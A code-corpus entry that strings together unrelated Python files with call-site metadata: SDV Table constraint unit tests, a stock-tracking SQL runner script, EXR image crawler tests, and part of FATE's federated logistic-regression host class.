The ``_transform_constraints`` method is expected to drop columns associated with
a constraint its transform raises a MissingConstraintColumnError and ``on_missing_column``
is set to drop.
Input:
- Table data
Output:
- Table with dropped columns
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
constraint_mock.constraint_columns = ['item 0']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data, 'drop')
# Assert
expected_result = pd.DataFrame({
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
assert result.equals(expected_result)
def test__validate_data_on_constraints(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are in the given data,
and the constraint.is_valid method returns True.
Input:
- Table data
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, True, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test__validate_data_on_constraints_invalid_input(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns False when the constraint columns are in the given data,
and the constraint.is_valid method returns False for any row.
Input:
- Table data contains an invalid row
Output:
- None
Side Effects:
- A ConstraintsNotMetError is thrown
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, False, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run and assert
with pytest.raises(ConstraintsNotMetError):
Table._validate_data_on_constraints(table_mock, data)
def test__validate_data_on_constraints_missing_cols(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are not
in the given data.
Input:
- Table data that is missing a constraint column
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.constraint_columns = ['a', 'b', 'c']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
|
[
"pandas.DataFrame",
"unittest.mock.patch.object",
"sdv.metadata.Table.from_dict",
"sdv.metadata.Table._transform_constraints",
"sdv.metadata.Table._validate_data_on_constraints",
"unittest.mock.Mock",
"sdv.metadata.Table._make_ids",
"sdv.metadata.Table._prepare_constraints",
"unittest.mock.patch",
"sdv.metadata.Table",
"sdv.metadata.Table.transform",
"pytest.raises",
"sdv.constraints.base.Constraint",
"pandas.Series"
] |
[((344, 381), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (356, 381), False, 'from unittest.mock import Mock, patch\n'), ((1551, 1588), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (1563, 1588), False, 'from unittest.mock import Mock, patch\n'), ((2785, 2822), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (2797, 2822), False, 'from unittest.mock import Mock, patch\n'), ((4107, 4144), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (4119, 4144), False, 'from unittest.mock import Mock, patch\n'), ((5394, 5495), 'unittest.mock.patch', 'patch', (['"""sdv.metadata.table.rdt.transformers.NumericalTransformer"""'], {'spec_set': 'NumericalTransformer'}), "('sdv.metadata.table.rdt.transformers.NumericalTransformer', spec_set=\n NumericalTransformer)\n", (5399, 5495), False, 'from unittest.mock import Mock, patch\n'), ((6308, 6351), 'unittest.mock.patch.object', 'patch.object', (['Table', '"""_prepare_constraints"""'], {}), "(Table, '_prepare_constraints')\n", (6320, 6351), False, 'from unittest.mock import Mock, patch\n'), ((921, 962), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (931, 962), False, 'from sdv.constraints.base import Constraint\n'), ((985, 1026), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (995, 1026), False, 'from sdv.constraints.base import Constraint\n'), ((1049, 1096), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (1059, 1096), False, 'from sdv.constraints.base import Constraint\n'), ((1409, 1448), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (1435, 1448), False, 'from sdv.metadata import Table\n'), ((2153, 2194), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (2163, 2194), False, 'from sdv.constraints.base import Constraint\n'), ((2217, 2258), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (2227, 2258), False, 'from sdv.constraints.base import Constraint\n'), ((2281, 2328), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (2291, 2328), False, 'from sdv.constraints.base import Constraint\n'), ((2643, 2682), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (2669, 2682), False, 'from sdv.metadata import Table\n'), ((3389, 3436), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (3399, 3436), False, 'from sdv.constraints.base import Constraint\n'), ((3459, 3506), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (3469, 3506), False, 'from sdv.constraints.base import Constraint\n'), ((3529, 3570), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (3539, 3570), False, 'from sdv.constraints.base import Constraint\n'), ((3593, 3634), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (3603, 3634), False, 'from sdv.constraints.base import Constraint\n'), ((3994, 4033), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (4020, 4033), False, 'from sdv.metadata import Table\n'), ((4721, 4768), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (4731, 4768), False, 'from sdv.constraints.base import Constraint\n'), ((4791, 4838), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (4801, 4838), False, 'from sdv.constraints.base import Constraint\n'), ((4861, 4902), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (4871, 4902), False, 'from sdv.constraints.base import Constraint\n'), ((4925, 4966), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (4935, 4966), False, 'from sdv.constraints.base import Constraint\n'), ((5963, 6011), 'sdv.metadata.Table', 'Table', ([], {'rounding': '(-1)', 'max_value': '(100)', 'min_value': '(-50)'}), '(rounding=-1, max_value=100, min_value=-50)\n', (5968, 6011), False, 'from sdv.metadata import Table\n'), ((6528, 6549), 'sdv.metadata.Table', 'Table', ([], {'constraints': '[]'}), '(constraints=[])\n', (6533, 6549), False, 'from sdv.metadata import Table\n'), ((6798, 6826), 'sdv.metadata.Table._make_ids', 'Table._make_ids', (['metadata', '(3)'], {}), '(metadata, 3)\n', (6813, 6826), False, 'from sdv.metadata import Table\n'), ((7537, 7567), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (7552, 7567), False, 'from sdv.metadata import Table\n'), ((7583, 7702), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {}), "({'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]})\n", (7595, 7702), True, 'import pandas as pd\n'), ((8245, 8275), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (8260, 8275), False, 'from sdv.metadata import Table\n'), ((8291, 8410), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [9, 1, 8, 2, 3, 7, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {}), "({'item 0': [9, 1, 8, 2, 3, 7, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]})\n", (8303, 8410), True, 'import pandas as pd\n'), ((8992, 9022), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (9007, 9022), False, 'from sdv.metadata import Table\n'), ((9038, 9189), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {'index': '[0, 1, 1, 2, 3, 5, 5, 6]'}), "({'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]}, index=[0, 1, 1, 2, 3, 5, 5, 6])\n", (9050, 9189), True, 'import pandas as pd\n'), ((9829, 9916), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [True, True, False]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [True, True, False]}, index=[0,\n 1, 2])\n", (9841, 9916), True, 'import pandas as pd\n'), ((10021, 10027), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (10025, 10027), False, 'from unittest.mock import Mock, patch\n'), ((10283, 10325), 'sdv.metadata.Table.transform', 'Table.transform', (['table_mock', 'data', '"""error"""'], {}), "(table_mock, data, 'error')\n", (10298, 10325), False, 'from sdv.metadata import Table\n'), ((10368, 10455), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [True, True, False]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [True, True, False]}, index=[0,\n 1, 2])\n", (10380, 10455), True, 'import pandas as pd\n'), ((11097, 11170), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (11109, 11170), True, 'import pandas as pd\n'), ((11232, 11308), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 0.5, 1], 'item 1': [6, 8, 10]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 0.5, 1], 'item 1': [6, 8, 10]}, index=[0, 1, 2])\n", (11244, 11308), True, 'import pandas as pd\n'), ((11375, 11381), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11379, 11381), False, 'from unittest.mock import Mock, patch\n'), ((11415, 11421), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11419, 11421), False, 'from unittest.mock import Mock, patch\n'), ((11578, 11584), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11582, 11584), False, 'from unittest.mock import Mock, patch\n'), ((11699, 11745), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (11727, 11745), False, 'from sdv.metadata import Table\n'), ((12410, 12483), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (12422, 12483), True, 'import pandas as pd\n'), ((12544, 12550), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (12548, 12550), False, 'from unittest.mock import Mock, patch\n'), ((12649, 12655), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (12653, 12655), False, 'from unittest.mock import Mock, patch\n'), ((13319, 13392), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (13331, 13392), True, 'import pandas as pd\n'), ((13453, 13459), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (13457, 13459), False, 'from unittest.mock import Mock, patch\n'), ((13614, 13620), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (13618, 13620), False, 'from unittest.mock import Mock, patch\n'), ((13705, 13759), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', (['table_mock', 'data', '"""drop"""'], {}), "(table_mock, data, 'drop')\n", (13733, 13759), False, 'from sdv.metadata import Table\n'), ((13804, 13856), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (13816, 13856), True, 'import pandas as pd\n'), ((14349, 14412), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (14361, 14412), True, 'import pandas as pd\n'), ((14473, 14479), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (14477, 14479), False, 'from unittest.mock import Mock, patch\n'), ((14528, 14557), 'pandas.Series', 'pd.Series', (['[True, True, True]'], {}), '([True, True, True])\n', (14537, 14557), True, 'import pandas as pd\n'), ((14635, 14641), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (14639, 14641), False, 'from unittest.mock import Mock, patch\n'), ((14726, 14779), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (14761, 14779), False, 'from sdv.metadata import Table\n'), ((15330, 15393), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (15342, 15393), True, 'import pandas as pd\n'), ((15454, 15460), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (15458, 15460), False, 'from unittest.mock import Mock, patch\n'), ((15509, 15539), 'pandas.Series', 'pd.Series', (['[True, False, True]'], {}), '([True, False, True])\n', (15518, 15539), True, 'import pandas as pd\n'), ((15617, 15623), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (15621, 15623), False, 'from unittest.mock import Mock, patch\n'), ((16248, 16311), 'pandas.DataFrame', 'pd.DataFrame', (["{'a': [0, 1, 2], 'b': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'a': [0, 1, 2], 'b': [3, 4, 5]}, index=[0, 1, 2])\n", (16260, 16311), True, 'import pandas as pd\n'), ((16372, 16378), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (16376, 16378), False, 'from unittest.mock import Mock, patch\n'), ((16461, 16467), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (16465, 16467), False, 'from unittest.mock import Mock, patch\n'), ((16552, 16605), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (16587, 16605), False, 'from sdv.metadata import Table\n'), ((5310, 5334), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (5323, 5334), False, 'import pytest\n'), ((5348, 5387), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (5374, 5387), False, 'from sdv.metadata import Table\n'), ((7081, 7106), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (7094, 7106), False, 'import pytest\n'), ((7120, 7149), 'sdv.metadata.Table._make_ids', 'Table._make_ids', (['metadata', '(20)'], {}), '(metadata, 20)\n', (7135, 7149), False, 'from sdv.metadata import Table\n'), ((12743, 12786), 'pytest.raises', 'pytest.raises', (['MissingConstraintColumnError'], {}), '(MissingConstraintColumnError)\n', (12756, 12786), False, 'import pytest\n'), ((12800, 12855), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', (['table_mock', 'data', '"""error"""'], {}), "(table_mock, data, 'error')\n", (12828, 12855), False, 'from sdv.metadata import Table\n'), ((15715, 15752), 'pytest.raises', 'pytest.raises', (['ConstraintsNotMetError'], {}), '(ConstraintsNotMetError)\n', (15728, 15752), False, 'import pytest\n'), ((15766, 15819), 'sdv.metadata.Table._validate_data_on_constraints', 'Table._validate_data_on_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (15801, 15819), False, 'from sdv.metadata import Table\n'), ((6851, 6877), 'pandas.Series', 'pd.Series', (["['a', 'b', 'c']"], {}), "(['a', 'b', 'c'])\n", (6860, 6877), True, 'import pandas as pd\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: <NAME>
import time
import sys
sys.path.append("..")
import database.db_operator as db_operator
import log.custom_logger as custom_logger
class GatherAllTrackingStocks:
'''
聚合汇总所有需要被跟踪的股票
'''
def __int__(self):
pass
def run_file_to_gather_all_tracking_stocks(self):
# 运行query脚本
# 相对路径,是相对于程序执行命令所在的目录,./ 表示的不是脚本所在的目录,而是程序执行命令所在的目录,也就是所谓的当前目录。
with open("../data_miner/sql_query/gather_all_tracking_stocks_query.sql", encoding='utf-8', mode='r') as f:
# 读取整个sql文件
# 分割sql文件中的执行语句,挨句执行
sql_list = f.read().split(';')[:-1]
for x in sql_list:
# 判断包含空行的
if '\n' in x:
# 替换空行为1个空格
x = x.replace('\n', ' ')
# 判断多个空格时
if ' ' in x:
# 替换为空
x = x.replace(' ', '')
# sql语句添加分号结尾
inserting_sql = x + ';'
try:
db_operator.DBOperator().operate("insert", "target_pool", inserting_sql)
except Exception as e:
# 日志记录
msg = '失败,无法成功将指数的历史估值信息插入 aggregated_data数据库中的index_components_historical_estimations表' + ' ' + str(
e)
custom_logger.CustomLogger().log_writter(msg, 'error')
def main(self):
self.run_file_to_gather_all_tracking_stocks()
if __name__ == '__main__':
time_start = time.time()
go = GatherAllTrackingStocks()
go.main()
time_end = time.time()
print('Time Cost: ' + str(time_end - time_start))
|
[
"sys.path.append",
"log.custom_logger.CustomLogger",
"database.db_operator.DBOperator",
"time.time"
] |
[((90, 111), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (105, 111), False, 'import sys\n'), ((1566, 1577), 'time.time', 'time.time', ([], {}), '()\n', (1575, 1577), False, 'import time\n'), ((1642, 1653), 'time.time', 'time.time', ([], {}), '()\n', (1651, 1653), False, 'import time\n'), ((1081, 1105), 'database.db_operator.DBOperator', 'db_operator.DBOperator', ([], {}), '()\n', (1103, 1105), True, 'import database.db_operator as db_operator\n'), ((1391, 1419), 'log.custom_logger.CustomLogger', 'custom_logger.CustomLogger', ([], {}), '()\n', (1417, 1419), True, 'import log.custom_logger as custom_logger\n')]
|
import os
import unittest
import glob
from ....BaseTestCase import BaseTestCase
from centipede.Crawler import Crawler
from centipede.PathHolder import PathHolder
from centipede.Crawler.Fs.Image import Exr
class ExrTest(BaseTestCase):
"""Test Exr crawler."""
__exrFile = os.path.join(BaseTestCase.dataDirectory(), "test.exr")
__exrSeq = os.path.join(BaseTestCase.dataDirectory(), "testSeq.0001.exr")
__exrAmbiguousSeq = os.path.join(BaseTestCase.dataDirectory(), "test_0001.exr")
def testExrCrawler(self):
"""
Test that the Exr crawler test works properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertIsInstance(crawler, Exr)
crawler = Crawler.create(PathHolder(BaseTestCase.dataDirectory()))
self.assertNotIsInstance(crawler, Exr)
def testExrVariables(self):
"""
Test that variables are set properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertEqual(crawler.var("type"), "exr")
self.assertEqual(crawler.var("category"), "image")
self.assertEqual(crawler.var("imageType"), "single")
def testExrWidthHeight(self):
"""
Test that width and height variables are processed properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertNotIn("width", crawler.varNames())
self.assertNotIn("height", crawler.varNames())
self.assertEqual(crawler.var("width"), 1828)
self.assertEqual(crawler.var("height"), 1556)
def testImageSequence(self):
"""
Test that detection of an image sequence works properly.
"""
crawler = Crawler.create(PathHolder(self.__exrFile))
self.assertFalse(crawler.isSequence())
crawler = Crawler.create(PathHolder(self.__exrSeq))
self.assertTrue(crawler.isSequence())
crawler = Crawler.create(PathHolder(self.__exrAmbiguousSeq))
self.assertTrue(crawler.isSequence())
def testImageSequenceVariables(self):
"""
Test that the image sequence related variables are set properly.
"""
crawler = Crawler.create(PathHolder(self.__exrSeq))
self.assertEqual(crawler.var("imageType"), "sequence")
self.assertEqual(crawler.var("name"), "testSeq")
self.assertEqual(crawler.var("frame"), 1)
self.assertEqual(crawler.var("padding"), 4)
crawler = Crawler.create(PathHolder(self.__exrAmbiguousSeq))
self.assertEqual(crawler.var("imageType"), "sequence")
self.assertEqual(crawler.var("name"), "test")
self.assertEqual(crawler.var("frame"), 1)
self.assertEqual(crawler.var("padding"), 4)
def testImageSequenceGroup(self):
"""
Test that an image sequence is grouped properly.
"""
paths = glob.glob("{}/testSeq.*.exr".format(self.dataDirectory()))
crawlers = list(map(lambda x: Crawler.create(PathHolder(x)), paths))
crawlers.append(Crawler.create(PathHolder(self.__exrFile)))
grouped = Exr.group(crawlers)
self.assertEqual(len(grouped), 2)
self.assertEqual(len(grouped[0]), len(paths))
self.assertEqual(len(grouped[1]), 1)
groupedPaths = list(map(lambda x: x.var("filePath"), grouped[0]))
self.assertEqual(groupedPaths, sorted(paths))
self.assertEqual(grouped[1][0].var("filePath"), self.__exrFile)
reversedGrouped = Exr.sortGroup(grouped, lambda x: x.var('filePath'), True)
reversedPaths = list(map(lambda x: x.var("filePath"), reversedGrouped[0]))
self.assertEqual(reversedPaths, sorted(paths, reverse=True))
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"centipede.PathHolder.PathHolder",
"centipede.Crawler.Fs.Image.Exr.group"
] |
[((3726, 3741), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3739, 3741), False, 'import unittest\n'), ((3096, 3115), 'centipede.Crawler.Fs.Image.Exr.group', 'Exr.group', (['crawlers'], {}), '(crawlers)\n', (3105, 3115), False, 'from centipede.Crawler.Fs.Image import Exr\n'), ((640, 666), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (650, 666), False, 'from centipede.PathHolder import PathHolder\n'), ((970, 996), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (980, 996), False, 'from centipede.PathHolder import PathHolder\n'), ((1332, 1358), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (1342, 1358), False, 'from centipede.PathHolder import PathHolder\n'), ((1732, 1758), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (1742, 1758), False, 'from centipede.PathHolder import PathHolder\n'), ((1840, 1865), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrSeq'], {}), '(self.__exrSeq)\n', (1850, 1865), False, 'from centipede.PathHolder import PathHolder\n'), ((1946, 1980), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrAmbiguousSeq'], {}), '(self.__exrAmbiguousSeq)\n', (1956, 1980), False, 'from centipede.PathHolder import PathHolder\n'), ((2201, 2226), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrSeq'], {}), '(self.__exrSeq)\n', (2211, 2226), False, 'from centipede.PathHolder import PathHolder\n'), ((2483, 2517), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrAmbiguousSeq'], {}), '(self.__exrAmbiguousSeq)\n', (2493, 2517), False, 'from centipede.PathHolder import PathHolder\n'), ((3049, 3075), 'centipede.PathHolder.PathHolder', 'PathHolder', (['self.__exrFile'], {}), '(self.__exrFile)\n', (3059, 3075), False, 'from centipede.PathHolder import PathHolder\n'), ((2986, 2999), 'centipede.PathHolder.PathHolder', 'PathHolder', (['x'], {}), '(x)\n', (2996, 2999), False, 'from centipede.PathHolder import PathHolder\n')]
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from arch.api import federation
from arch.api.utils import log_utils
from federatedml.logistic_regression.hetero_logistic_regression.hetero_lr_base import HeteroLRBase
from federatedml.optim.gradient import HeteroLogisticGradient
from federatedml.secureprotol import EncryptModeCalculator
from federatedml.statistic.data_overview import rubbish_clear
from federatedml.util import consts
from federatedml.statistic import data_overview
LOGGER = log_utils.getLogger()
class HeteroLRHost(HeteroLRBase):
def __init__(self):
super(HeteroLRHost, self).__init__()
self.batch_num = None
self.batch_index_list = []
self.role = consts.HOST
def compute_forward(self, data_instances, coef_, intercept_, batch_index=-1):
"""
Compute W * X + b and (W * X + b)^2, where X is the input data, W is the coefficient of lr,
and b is the interception
Parameters
----------
data_instances: DTable of Instance, input data
coef_: list, coefficient of lr
intercept_: float, the interception of lr
"""
wx = self.compute_wx(data_instances, coef_, intercept_)
en_wx = self.encrypted_calculator[batch_index].encrypt(wx)
wx_square = wx.mapValues(lambda v: np.square(v))
en_wx_square = self.encrypted_calculator[batch_index].encrypt(wx_square)
host_forward = en_wx.join(en_wx_square, lambda wx, wx_square: (wx, wx_square))
# temporary resource recovery and will be removed in the future
rubbish_list = [wx,
en_wx,
wx_square,
en_wx_square
]
rubbish_clear(rubbish_list)
return host_forward
def fit(self, data_instances):
"""
Train lr model of role host
Parameters
----------
data_instances: DTable of Instance, input data
"""
LOGGER.info("Enter hetero_lr host")
self._abnormal_detection(data_instances)
self.header = self.get_header(data_instances)
public_key = federation.get(name=self.transfer_variable.paillier_pubkey.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.paillier_pubkey),
idx=0)
LOGGER.info("Get public_key from arbiter:{}".format(public_key))
self.encrypt_operator.set_public_key(public_key)
batch_info = federation.get(name=self.transfer_variable.batch_info.name,
tag=self.transfer_variable.generate_transferid(self.transfer_variable.batch_info),
idx=0)
LOGGER.info("Get batch_info from guest:" + str(batch_info))
self.batch_size = batch_info["batch_size"]
self.batch_num = batch_info["batch_num"]
if self.batch_size < consts.MIN_BATCH_SIZE and self.batch_size != -1:
raise ValueError(
"Batch size get from guest should not less than 10, except -1, batch_size is {}".format(
self.batch_size))
self.encrypted_calculator = [EncryptModeCalculator(self.encrypt_operator,
self.encrypted_mode_calculator_param.mode,
self.encrypted_mode_calculator_param.re_encrypted_rate) for _
in range(self.batch_num)]
LOGGER.info("Start initialize model.")
model_shape = self.get_features_shape(data_instances)
if self.init_param_obj.fit_intercept:
self.init_param_obj.fit_intercept = False
if self.fit_intercept:
self.fit_intercept = False
self.coef_ = self.initializer.init_model(model_shape, init_params=self.init_param_obj)
self.n_iter_ = 0
index_data_inst_map = {}
while self.n_iter_ < self.max_iter:
LOGGER.info("iter:" + str(self.n_iter_))
batch_index = 0
while batch_index < self.batch_num:
LOGGER.info("batch:{}".format(batch_index))
# set batch_data
if len(self.batch_index_list) < self.batch_num:
batch_data_index = federation.get(name=self.transfer_variable.batch_data_index.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.batch_data_index, self.n_iter_,
batch_index),
idx=0)
LOGGER.info("Get batch_index from Guest")
self.batch_index_list.append(batch_data_index)
else:
batch_data_index = self.batch_index_list[batch_index]
# Get mini-batch train data
if len(index_data_inst_map) < self.batch_num:
batch_data_inst = batch_data_index.join(data_instances, lambda g, d: d)
index_data_inst_map[batch_index] = batch_data_inst
else:
batch_data_inst = index_data_inst_map[batch_index]
LOGGER.info("batch_data_inst size:{}".format(batch_data_inst.count()))
# transforms features of raw input 'batch_data_inst' into more representative features 'batch_feat_inst'
batch_feat_inst = self.transform(batch_data_inst)
# compute forward
host_forward = self.compute_forward(batch_feat_inst, self.coef_, self.intercept_, batch_index)
federation.remote(host_forward,
name=self.transfer_variable.host_forward_dict.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.host_forward_dict,
self.n_iter_,
batch_index),
role=consts.GUEST,
idx=0)
LOGGER.info("Remote host_forward to guest")
# compute host gradient
fore_gradient = federation.get(name=self.transfer_variable.fore_gradient.name,
tag=self.transfer_variable.generate_transferid(
self.transfer_variable.fore_gradient, self.n_iter_, batch_index),
idx=0)
LOGGER.info("Get fore_gradient from guest")
if self.gradient_operator is None:
self.gradient_operator = HeteroLogisticGradient(self.encrypt_operator)
